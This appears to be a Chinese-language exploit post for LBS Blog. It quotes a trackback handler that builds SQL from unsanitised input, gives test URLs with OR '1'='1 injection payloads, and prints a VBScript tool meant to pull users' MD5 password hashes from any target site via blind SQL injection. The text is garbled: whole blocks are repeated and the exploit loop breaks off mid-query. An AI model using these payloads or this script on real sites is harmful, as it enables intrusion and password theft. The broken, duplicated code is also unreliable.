function trackbackSave(){
var tbEntry={"log_id": input["id"],
"url": input["url"],
"title": input["title"],
"excerpt": input["excerpt"],
"blog": input["blog_name"]
}
// These function calls look really horrible
tbEntry.log_id=func.checkInt(tbEntry.log_id);
tbEntry.url=func.trim(func.wordFilter(func.checkURL(tbEntry.url)));
tbEntry.title=func.trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.title))));
tbEntry.excerpt=func.trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.excerpt))));
tbEntry.blog=func.trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.blog))));
if(tbEntry.title=="") tbEntry.title=tbEntry.url;
// Better Leave the error messages below in English
if(!tbEntry.log_id)
trackbackResponse(1, "Invalid Article ID");
if(tbEntry.url=="")
trackbackResponse(1, "Source URL is Blank");
if(tbEntry.url==false||tbEntry.title==false||tbEntry.excerpt==false||tbEntry.blog==false)
trackbackResponse(1, "Content contains blocked words");
var tmpA=connBlog.query("select Count(log_ID) as i FROM blog_Article where log_locked=false AND log_mode<4 AND log_ID="+tbEntry.log_id);
if(tmpA[0]["i"]==0) trackbackResponse(1, "Article does not exist or is locked");
tmpA=connBlog.query("select Count(tb_ID) as i FROM blog_Trackback where tb_Title='"+tbEntry.title+"' AND tb_Excerpt='"+tbEntry.excerpt+"'");
if(tmpA[0]["i"]>0) trackbackResponse(1, "Trackback is already saved");
// Saving trackback
var tbEntry={"log_id": input["id"],
"url": input["url"],
"title": input["title"],
"excerpt": input["excerpt"],
"blog": input["blog_name"]
}
// These function calls look really horrible
tbEntry.log_id=func.checkInt(tbEntry.log_id);
tbEntry.url=func.trim(func.wordFilter(func.checkURL(tbEntry.url)));
tbEntry.title=func.trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.title))));
tbEntry.excerpt=func.trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.excerpt))));
tbEntry.blog=func.trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.blog))));
if(tbEntry.title=="") tbEntry.title=tbEntry.url;
// Better Leave the error messages below in English
if(!tbEntry.log_id)
trackbackResponse(1, "Invalid Article ID");
if(tbEntry.url=="")
trackbackResponse(1, "Source URL is Blank");
if(tbEntry.url==false||tbEntry.title==false||tbEntry.excerpt==false||tbEntry.blog==false)
trackbackResponse(1, "Content contains blocked words");
var tmpA=connBlog.query("select Count(log_ID) as i FROM blog_Article where log_locked=false AND log_mode<4 AND log_ID="+tbEntry.log_id);
if(tmpA[0]["i"]==0) trackbackResponse(1, "Article does not exist or is locked");
tmpA=connBlog.query("select Count(tb_ID) as i FROM blog_Trackback where tb_Title='"+tbEntry.title+"' AND tb_Excerpt='"+tbEntry.excerpt+"'");
if(tmpA[0]["i"]>0) trackbackResponse(1, "Trackback is already saved");
// Saving trackback
注意
tbEntry.log_id=func.checkInt(tbEntry.log_id);
tbEntry.url=func.trim(func.wordFilter(func.checkURL(tbEntry.url)));
tbEntry.title=func.trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.title))));
tbEntry.excerpt=func.trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.excerpt))));
tbEntry.blog=func.trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.blog))));
tbEntry.url=func.trim(func.wordFilter(func.checkURL(tbEntry.url)));
tbEntry.title=func.trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.title))));
tbEntry.excerpt=func.trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.excerpt))));
tbEntry.blog=func.trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.blog))));
log_id被检查为 int 类型了,但是url以及excerpt等等呢?只是wordfilter以及tril以及去掉html的敏感东西而已,对注射是没有影响的,这些东西是从
var tbEntry={"log_id": input["id"],
"url": input["url"],
"title": input["title"],
"excerpt": input["excerpt"],
"blog": input["blog_name"]
}
input里来的哈~~~~,很明显的一个注射嘛!
因为这里注射的特殊性我们要用or,是一个字符类型的注射
http://127.0.0.1/aspscripts/lbs2.0.311/lbs/trackback.asp?url=1&id=1&blog_name=fffff&excerpt=1111'%20or%20'1'='1
http://127.0.0.1/aspscripts/lbs2.0.311/lbs/trackback.asp?url=1&id=1&blog_name=fffff&excerpt=1111'%20or%20'1'='2
这样可以看到效果
标志也很明显就是Trackback is already saved
那么好了 exploit也应该出来了
'============================================================================
'使用说明:
' 在命令提示符下:
' cscript.exe lbsblog.vbs 要攻击的网站的博客路径 要破解的博客用户密码
'如:
' cscript.exe lbsblog.vbs www.xxxx.com/bbs/boke.asp admin
' by loveshell
'============================================================================
On Error Resume Next
Dim oArgs
Dim olbsXML 'XMLHTTP对象用来打开目标网址
Dim TargetURL '目标网址
Dim userid '博客用户名
Dim TempStr '存放已获取的部分 MD5密码
Dim CharHex '定义16进制字符
Dim charset
Set oArgs = WScript.arguments
If oArgs.count <> 2 Then Call ShowUsage()
Set olbsXML = createObject("Microsoft.XMLHTTP")
'补充完整目标网址
TargetURL = oArgs(0)
If LCase(Left(TargetURL,7)) <> "http://" Then TargetURL = "http://" & TargetURL
If right(TargetURL,1) <> "/" Then TargetURL = TargetURL & "/"
TargetURL=TargetURL & "trackback.asp"
userid=oArgs(1)
TempStr=""
CharHex=Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f",",")
WScript.echo "LBS Blog All version Exploit[新的注射漏洞]"&vbcrlf
WScript.echo "By 剑心"&vbcrlf
WScript.echo "http://www.loveshell.net/ ~_~我真的够无聊的......"&vbcrlf&vbcrlf
WScript.echo "+Fuck the site now"&vbcrlf
Call main(TargetURL,BlogName)
Set oBokeXML = Nothing
'----------------------------------------------sub-------------------------------------------------------
'============================================
'函数名称:main
'函数功能:主程序,注入获得blog 用户密码
'============================================
Sub main(TargetURL,BlogName)
Dim MainOffset,SubOffset,TempLen,OpenURL,GetPage
For MainOffset = 1 To 40
For SubOffset = 0 To 15
TempLen = 0
postdata = ""
postdata = "' or (select left(user_password,"&MainOffset&") from blog_user where user_
WScript.Quit
End Sub
'使用说明:
' 在命令提示符下:
' cscript.exe lbsblog.vbs 要攻击的网站的博客路径 要破解的博客用户密码
'如:
' cscript.exe lbsblog.vbs www.xxxx.com/bbs/boke.asp admin
' by loveshell
'============================================================================
On Error Resume Next
Dim oArgs
Dim olbsXML 'XMLHTTP对象用来打开目标网址
Dim TargetURL '目标网址
Dim userid '博客用户名
Dim TempStr '存放已获取的部分 MD5密码
Dim CharHex '定义16进制字符
Dim charset
Set oArgs = WScript.arguments
If oArgs.count <> 2 Then Call ShowUsage()
Set olbsXML = createObject("Microsoft.XMLHTTP")
'补充完整目标网址
TargetURL = oArgs(0)
If LCase(Left(TargetURL,7)) <> "http://" Then TargetURL = "http://" & TargetURL
If right(TargetURL,1) <> "/" Then TargetURL = TargetURL & "/"
TargetURL=TargetURL & "trackback.asp"
userid=oArgs(1)
TempStr=""
CharHex=Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f",",")
WScript.echo "LBS Blog All version Exploit[新的注射漏洞]"&vbcrlf
WScript.echo "By 剑心"&vbcrlf
WScript.echo "http://www.loveshell.net/ ~_~我真的够无聊的......"&vbcrlf&vbcrlf
WScript.echo "+Fuck the site now"&vbcrlf
Call main(TargetURL,BlogName)
Set oBokeXML = Nothing
'----------------------------------------------sub-------------------------------------------------------
'============================================
'函数名称:main
'函数功能:主程序,注入获得blog 用户密码
'============================================
Sub main(TargetURL,BlogName)
Dim MainOffset,SubOffset,TempLen,OpenURL,GetPage
For MainOffset = 1 To 40
For SubOffset = 0 To 15
TempLen = 0
postdata = ""
postdata = "' or (select left(user_password,"&MainOffset&") from blog_user where user_
WScript.Quit
End Sub